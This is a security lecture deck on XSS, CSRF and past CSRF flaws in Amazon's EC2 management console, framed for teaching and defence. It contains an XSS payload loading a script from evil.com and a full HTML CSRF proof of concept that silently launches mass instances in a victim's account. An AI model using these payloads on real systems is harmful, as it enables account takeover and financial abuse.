Cloud Insecurity
Marco Arena
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Recalls
• An XSS (Cross-Site Scripting) vulnerability
  allows an attacker to use a website to
  deliver an attack: the website becomes
  the vector through which attackers reach
  their victims.

• XSS is one of the most widely reported
  web application vulnerabilities.
Recalls
• XSS, a simple example (server-side JSP):

    <c:if test="${param.sayHello}">
       Hello ${param.name}!
    </c:if>

  Evil parameter (the URL-encoded value of name):

    %3Cscript%20src%3D%22http%3A//evil.com/evil.js%22%3E%3C/script%3E

  Result:

    Hello <script src="http://evil.com/evil.js"></script>
Recalls
• CSRF (Cross-Site Request Forgery) is an
  attack which forces an end user to
  execute unwanted actions on a web
  application in which he/she is currently
  authenticated.

• CSRF tricks the victim into loading a page
  that contains a malicious request.
Recalls
• CSRF, a simple example:

  The user has an active session on a trusted blog (e.g. MySpace).
  While that session is alive, the user visits an evil site whose
  page contains:

    ...
    <img src="http://trustedblog.com/addfriend.php?id=12345"/>
    ...

  The browser fetches the image URL and attaches the user's blog
  cookies to the request, so the blog performs "add friend 12345"
  as the logged-in user. The user never sees the request or its
  response.
Attacks against EC2
• The Amazon EC2 cloud is managed via web
  services and web interface consoles.

• The web management console asks the user to
  provide her Amazon.com username and
  password.

• The login page is hosted on the Amazon.com
  domain, so the console user's session is
  exposed to web application vulnerabilities
  found anywhere on that domain, not only in
  the console itself.
Attacks against EC2
• Once an attacker gains access to the EC2
  user’s session, the Amazon web
  management console offers a wealth of
  information related to the victim’s EC2
  instances (X.509 certificates, secret
  tokens, ...).
Attacks against EC2
• If the attacker discovers an XSS
  vulnerability anywhere on the
  Amazon.com domain, he can use a simple
  JavaScript payload to steal the EC2 user’s
  Access Key ID and Secret Access Key.
Amazon EC2 real vulnerabilities
• The security of a user's AMI instances
  therefore depends on the security of the
  web management console.

• Several portions of Amazon's web
  management console were vulnerable to
  cross-site request forgery (CSRF) attacks.
Web management console vulnerabilities

• The first CSRF vulnerability allows the
  attacker to start an arbitrary AMI instance
  using the victim's EC2 account.

• Two parts:
  – Initialize the launch wizard with the
    attacker's ("evil") AMI;
  – Launch the instance under the victim's EC2
    account.
Web management console vulnerabilities

initialize.html (a cross-domain image tag: the browser sends the
GET to the console and attaches the victim's console cookies to it):

<html>
<body>
<img
  src="https://console.aws.amazon.com/ec2/_launchWizardForm.jsp?action.ImageId=ami-00031337&architecture=i386&image_icon=%2Fimages%2Flogo_windows.gif&image_title=Basic%20Microsoft%20Windows%20Server%202003&selected_language=undefined&groupName=Webserver&keyName=undefined">
</body>
</html>
Web management console vulnerabilities

launch.html (auto-submits a cross-site POST five seconds later,
giving initialize.html time to complete; the browser attaches the
victim's console cookies to the POST):

<html>
<body>
<form action="https://console.aws.amazon.com/ec2/runInstancesJson?"
id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
<input type="hidden" name="action.MinCount" value="1" />
<input type="hidden" name="action.InstanceType" value="m1.small" />
<input type="hidden" name="action.SecurityGroup" value="default" />
<input type="hidden" name="action.SecurityGroup" value="Webserver" />
<!-- MaxCount far above MinCount: EC2 launches as many instances
     as the victim's account limits allow -->
<input type="hidden" name="action.MaxCount" value="1000000" />
<input type="hidden" name="action.ImageId" value="ami-00031337" />
<input type="hidden" name="mbtc" value="50084" />
<input type="hidden" name="region" value="us-east-1" />
</form>
<script>
/* submit without any user interaction */
setTimeout("document.LaunchEvilAMI.submit()",5000);
</script>
</body>
</html>
Web management console vulnerabilities

Merge (both pages are loaded in zero-size iframes, so the browser
never displays the web server's replies and the victim sees nothing):

<html>
<body>
<iframe src="./initialize.html" height="0"
  width="0"></iframe>
<iframe src="./launch.html" height="0"
  width="0"></iframe>
</body>
</html>
Web management console vulnerabilities

• The second vulnerability terminates
  arbitrary instances being run by the victim.

• After the attack is launched, the victim
  can see that the instance was terminated
  without her consent.
Web management console vulnerabilities

• The last vulnerability involves the
  deletion of EC2 key pairs.

• Using a CSRF vulnerability, an attacker
  has the ability to delete arbitrary key
  pairs from a victim's EC2 account. If the
  key pair is deleted, and the user has not
  properly backed up the key pair, he will
  have lost access to his own AMIs!
  (EC2 stores only the public half of a key
  pair: deleting it prevents new instances
  from being launched with it, while a
  running instance still accepts the
  matching private key if the user kept a
  copy.)
AWS portals vulnerabilities

• AWS was the first method Amazon provided to
  manage AMIs and is generally considered the
  most secure option for AMI administration.

• The three most common methods of
  authentication are:
  – a username/password combination;
  – an Access Key ID/Secret Access Key combination;
  – X.509 certificates.
AWS portals vulnerabilities

• The first attack against the AWS portal
  generates a new access key for the victim's
  account.

• Access keys authenticate a user to AWS,
  which is used to administer and manage the
  various AMIs running in the user's account.

• The attacker can create a temporary denial of
  service: the administrator must now update
  every application that authenticates with the
  access key to use the newly generated one.
AWS portals vulnerabilities

• This next attack forcibly deletes any
  X.509 certificates previously generated
  by the EC2 user.

• Once the X.509 certificates are deleted,
  any application that relied on X.509
  certificate authentication must be
  redeployed with the newly generated
  certificates.
Conclusions

• Cloud Computing allows organizations to
  focus on their core business while
  ensuring that their IT infrastructures are
  flexible enough to meet the demands of
  current and future users.

• But it does not magically protect
  application logic from abuse or prevent
  attacks against the application level.
Conclusions

• Uploading the most hardened virtual
  machine will not prevent attacks against
  the web-based management consoles
  that are used to administer the virtual
  machines.

• Cloud providers must fix their security
  bugs and perform continuous code
  review.
References

• Hacking: The Next Generation
  Nitesh Dhanjani, Billy Rios, and Brett Hardin. O'Reilly, 2009.

• Hacking Exposed: Web 2.0
  Rich Cannings, Himanshu Dwivedi, Zane Lackey. McGraw-Hill, 2008.

• Secure Programming with Static Analysis
  Brian Chess, Jacob West. Addison-Wesley, 2007.

Weitere ähnliche Inhalte

Was ist angesagt?

Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance PreparationEbizon
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsAri Apridana
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupAngela Bowman
 

Was ist angesagt? (6)

Amazon cloudtutorial
Amazon cloudtutorialAmazon cloudtutorial
Amazon cloudtutorial
 
Security Function
Security FunctionSecurity Function
Security Function
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance Preparation
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its Threats
 
Xss frame work
Xss frame workXss frame work
Xss frame work
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress Meetup
 

Andere mochten auch

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10LJepson
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and whiteDosage
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室Fujtia Naoya
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giantparamlowe
 
Expansion termica Expansion lineal
Expansion termica   Expansion linealExpansion termica   Expansion lineal
Expansion termica Expansion linealMAREST10
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983Dosage
 

Andere mochten auch (7)

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and white
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giant
 
Expansion termica Expansion lineal
Expansion termica   Expansion linealExpansion termica   Expansion lineal
Expansion termica Expansion lineal
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 

Ähnlich wie Cloud Insecurity

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Amazon Web Services
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale Amazon Web Services
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesAmazon Web Services
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtHelen Rogers
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon Web Services
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overviewAjay Bidari
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!政雄 金森
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at ScaleAmazon Web Services
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWSAmazon Web Services
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessAmazon Web Services
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAmazon Web Services
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAmazon Web Services
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...Amazon Web Services Korea
 

Ähnlich wie Cloud Insecurity (20)

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale
 
Getting Started with Amazon EC2
Getting Started with Amazon EC2Getting Started with Amazon EC2
Getting Started with Amazon EC2
 
Amazon s3ec2
Amazon s3ec2Amazon s3ec2
Amazon s3ec2
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best Practices
 
Aws interview questions
Aws interview questionsAws interview questions
Aws interview questions
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John Hildebrandt
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep Dive
 
Cloud Security (AWS)
Cloud Security (AWS)Cloud Security (AWS)
Cloud Security (AWS)
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overview
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at Scale
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWS
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverless
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
 

Kürzlich hochgeladen

Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 

Kürzlich hochgeladen (20)

Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 

Cloud Insecurity

  • 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 3. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  • 5. Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
  • 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  • 7. Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
  • 8. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  • 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  • 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  • 12. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  • 14. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
Web management console vulnerabilities
• The first vulnerability allows the attacker to start an arbitrary AMI instance using the victim's EC2 account.
• Two parts:
  – Initialize an evil AMI;
  – Launch the instance under the victim's EC2 account.

Web management console vulnerabilities
initialize.html (a cross-domain image tag: the browser sends the GET with the victim's console cookies attached):

<html>
  <body>
    <img src="https://console.aws.amazon.com/ec2/_launchWizardForm.jsp?action.ImageId=ami-00031337&architecture=i386&image_icon=%2Fimages%2Flogo_windows.gif&image_title=Basic%20Microsoft%20Windows%20Server%202003&selected_language=undefined&groupName=Webserver&keyName=undefined">
  </body>
</html>

Web management console vulnerabilities
launch.html:

<html>
  <body>
    <!-- The victim's browser attaches her console session cookie to this POST -->
    <form action="https://console.aws.amazon.com/ec2/runInstancesJson?"
          id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
      <input type="hidden" name="action.MinCount" value="1" />
      <input type="hidden" name="action.InstanceType" value="m1.small" />
      <input type="hidden" name="action.SecurityGroup" value="default" />
      <input type="hidden" name="action.SecurityGroup" value="Webserver" />
      <input type="hidden" name="action.MaxCount" value="1000000" />
      <input type="hidden" name="action.ImageId" value="ami-00031337" />
      <input type="hidden" name="mbtc" value="50084" />
      <input type="hidden" name="region" value="us-east-1" />
    </form>
    <script>
      // Submit 5 seconds later, giving initialize.html time to prime the wizard
      setTimeout("document.LaunchEvilAMI.submit()", 5000);
    </script>
  </body>
</html>
Web management console vulnerabilities
Merge (both pages are loaded in zero-size frames, so the browser never displays the web server's reply to the victim):

<html>
  <body>
    <iframe src="./initialize.html" height="0" width="0"></iframe>
    <iframe src="./launch.html" height="0" width="0"></iframe>
  </body>
</html>
Web management console vulnerabilities
• The second vulnerability terminates arbitrary AMIs being run by the victim.
• After the attack is launched, the victim can see that the instance was terminated without her consent.

Web management console vulnerabilities
• The last vulnerability involves the deletion of AMI key pairs.
• Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim's EC2 session. If the key pair is deleted and the user has not properly backed it up, she has lost access to her own AMIs!
AWS portals vulnerabilities
• AWS (the web services interface) was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration.
• The three most common methods of authentication are:
  – a username/password combination;
  – an Access Key ID/Secret Access Key combination;
  – X.509 certificates.

AWS portals vulnerabilities
• The first attack against AWS generates a new access key for the EC2 user's session.
• Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user's account.
• The attacker can create a temporary denial of service: the old key stops working, so the administrator must now update every application that uses access key authentication to use the newly generated key.

AWS portals vulnerabilities
• The next attack forcibly deletes any X.509 certificates previously generated by the EC2 user.
• Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with newly generated certificates.
Conclusions
• Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users.
• But it does not magically protect application logic from abuse or prevent attacks at the application level.

Conclusions
• Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines.
• Cloud providers must fix their security bugs and perform continuous code review.

References
• Nitesh Dhanjani, Billy Rios, Brett Hardin. Hacking: The Next Generation. O'Reilly, 2009.
• Rich Cannings, Himanshu Dwivedi, Zane Lackey. Hacking Exposed Web 2.0. McGraw-Hill, 2008.
